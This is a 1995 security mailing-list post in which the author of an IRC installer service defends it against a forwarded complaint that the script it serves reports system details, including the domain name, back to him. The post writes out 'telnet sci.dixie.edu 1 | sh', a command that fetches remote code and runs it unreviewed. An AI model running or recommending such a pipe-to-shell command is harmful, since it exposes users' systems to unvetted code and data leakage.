> ---------- Forwarded message ---------- > Date: Thu, 7 Sep 1995 16:50:56 -0400 > From: Ken Weaverling <weave@hopi.dtcc.edu> > To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM> > Subject: telnet sci.dixie.edu 1 > > If you telnet to sci.dixie.edu port 1, you get a shell script back. Obviously > this is set up to be run as > > telnet sci.dixie.edu 1 | sh > > The script builds an executable IRC client, real nice for the novice to > set up IRC on their own. > > While that alone bothers me enough, part of the script emails the author > some *interesting* information about your system, including the > NIS domain name. > > Sigh.. I guess I should make up an FAQ for people who keep coming up with the same concerns since the past year or two, over Usenet groups, mailing lists, etc Anyway, let me address the issues: * This command is dangerous - don't do it! True. The truly paranoid should telnet sci.dixie.edu 1 > shscript and examine shscript. The truly paranoid should also examine megabytes of _any_ source code downloaded from an ftp site before compiling and running it. How do the two relate? The service uses a secure port (<1024) for downloading the script, which means that it must run as root. ftpd also must run as root for obvious reasons. Trusting this service is equivalent to trusting that the source code on an ftp site has not been tampered with. 99% of the ftp sites don't use md5 signatures even. Not to mention that most machines out there don't even have it compiled - something that I'd dearly like to do (incorporate some kind of md5 checking). But I'm digressing... Recently, ftp sites carrying the ircII client were compromised and a bogus copy was put up, before it was detected. A CERT notice can be found in their archives. They're also aware of this service, and had contacted dixie admins and myself to verify that the service itself hadn't been compromised. * The command logs stuff and mails the author - bad!! The main reason I log errors is to determine what went wrong and fix it for other platforms. I've ported this auto-source patcher to almost 15 different platforms/OS'es. I mainly log the Makefile results, and the output of some other sundry commands such as uname -a, time, hostname, domainname, etc. Although the original poster is right about the dommainname being returned, he neglected to mention _where_, _how_ and _why_ this command was being used. This command is used in conjunction of several other checks to return the closest IRC server to the site. If you check the script (telnet sci.dixie.edu 1 > filename for a copy), you'll find that the script tries to find where you're situated in the world by going through a combination of the 'hostname' (which doesn't work on many Unices :/) check, domainname check and timezone check in case the previous two fail. It then selects the appropriate server. All command outputs are logged so I _know_ what to put in on system type XXX so that it doesn't happen again. Most system services keeps some sort of logs or the other. Anyway, posts such as these prompted me to put up a disclaimer in the script to use it at your own risk. This is a _free_ service that I provide to the Internet community, and hundreds of people have benefitted from it over the years. There are a lot more vicious(and obfuscated) things a person can do if disguising backdoors in C code. The crux is, you have to trust _somebody_ _somewhere_ when downloading software from ftp sites, or installing irc using this service. Of course, the best solution is not to trust anyone and pore through the code yourself. I do wish that Ken had at least cc'ed me a copy of this post when sending it to a list that I do not subscribe to :-( Please cc me at mmmirash@mailhost.ecn.uoknor.edu if there are followups. Thanks Mandar Mandar Mirashi, | Std. Disclaimer: All opinions expressed Systems Support Programmer, | belong solely to myself and in no Engineering Computer Network| way reflect those of my employers. University of Oklahoma (OU).| mandar@uoknor.edu, Mmmm@alias.undernet.org